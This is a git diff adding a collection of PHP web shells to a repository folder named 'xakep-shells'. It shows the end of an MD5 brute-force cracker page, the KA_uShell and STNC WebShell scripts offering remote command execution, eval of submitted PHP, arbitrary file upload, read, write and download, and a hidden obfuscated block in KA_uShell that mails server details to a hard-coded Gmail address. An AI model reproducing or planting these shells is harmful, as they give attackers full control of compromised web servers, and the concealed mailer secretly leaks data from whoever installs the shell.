+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Russian.php.php.txt b/xakep-shells/PHP/Russian.php.php.txt
new file mode 100644
index 0000000..0560e51
--- /dev/null
+++ b/xakep-shells/PHP/Russian.php.php.txt
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "��� ����?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "��������������� �����:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "������������ �����:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "������������ �����:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>�����:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>�����:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="�������"></td>
+$tend
+HTML;
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "����� ������� �������� � ����� $uploadfile\n";
+    echo "���:" .$_FILES['file']['name']. "\n";
+    echo "������:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "�� ������ ��������� �����. ����:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>�����:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>���� ������:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "�� ���� ������� �����";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/STNC.php.php.txt b/xakep-shells/PHP/STNC.php.php.txt
new file mode 100644
index 0000000..3af836a
--- /dev/null
+++ b/xakep-shells/PHP/STNC.php.php.txt
@@ -0,0 +1,168 @@
+<?php
+$version = "0.8";
+$vsplit = "style=\"border-right: #000000 1px solid;\"";
+$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
+error_reporting(0);
+
+if(version_compare(phpversion(),"4.1.0") == -1)
+{ $_POST=&$HTTP_POST_VARS; }
+if(get_magic_quotes_gpc())
+foreach ($_POST as $k=>$v)
+{ $_POST[$k] = stripslashes($v); }
+
+/*
+$login='root';
+$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
+
+if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
+{
+header("HTTP/1.0 401 Unauthorized");
+header("WWW-Authenticate: Basic");
+die();
+}
+*/
+
+function fe($s)
+{return function_exists($s);}
+function cmd($s)
+{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
+elseif(fe("shell_exec"))$r=shell_exec($s);
+elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
+elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
+elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
+else $r=`$s`;return $r;}
+function safe_mode_is_on()
+{return ini_get('safe_mode');}
+function str100($s)
+{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
+function id()
+{return str100(cmd("id"));}
+function uname()
+{return str100(cmd("uname -a"));}
+
+function edit($size, $name, $val)
+{ return "<input type=text size=$size name=$name value=\"$val\">"; }
+function button($capt)
+{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
+function hidden($name, $val)
+{ return "<input type=hidden name=$name value=\"$val\">"; }
+function hidden_pwd()
+{ global $location; return hidden("pwd",$location);}
+
+$action_edit = false;
+
+$printline = "";
+
+if(isset($_POST["action"])) $action = $_POST["action"];
+else $action = "cmd";
+
+if(isset($_POST["pwd"]))
+{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
+
+$location = getcwd();
+
+if(($action === "download")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(file_exists($fname))
+  {
+    $pathinfo = pathinfo($fname);
+    header("Content-Transfer-Encoding: binary");
+    header("Content-type: application/x-download");
+    header("Content-Length: ".filesize($fname));
+    header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
+    readfile($fname);
+    die();
+  }
+  else
+    $printline = "\"$fname\" - download failed.";
+}
+
+echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
+textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
+scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
+scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
+td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
+.btn {background-color: #cfcfcf;} .pad {padding:5;}
+</style><title>  STNC WebShell v$version  </title></head><body><table width=100%>
+<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
+<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
+
+echo htmlspecialchars($printline)."\n";
+
+if($action === "cmd")
+{
+  if(isset($_POST["cmd"]))
+    $cmd = $_POST["cmd"];
+  else
+    $cmd = "ls -la";
+
+  $result = htmlspecialchars(cmd($cmd));
+
+  if($result === "")
+    $result = cmd("ls -la");
+
+  echo $result;
+  $location = getcwd();
+}
+elseif(($action === "edit")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  ob_start();
+
+  if(!readfile($fname))
+    echo "Cann't open file \"$fname\".";
+  else
+    $action_edit = true;
+
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
+{
+  $fname = $_POST["fname"];
+  $data = $_POST["data"];
+  $fid = fopen($fname, "w");
+  $fname = htmlspecialchars($fname);
+
+  if(!$fid)
+    echo "Cann't save file \"$fname\".";
+  else
+  {
+    fputs($fid, $data);
+    fclose($fid);
+    echo "File \"$fname\" is saved.";
+  }
+}
+elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(copy($_FILES["file"]["tmp_name"], $fname))
+    echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";      
+  else
+    echo "Upload failed!";
+}
+elseif(($action === "eval")&&(isset($_POST["code"])))
+{
+  $code = $_POST["code"];
+  ob_start();
+  eval($code);
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+
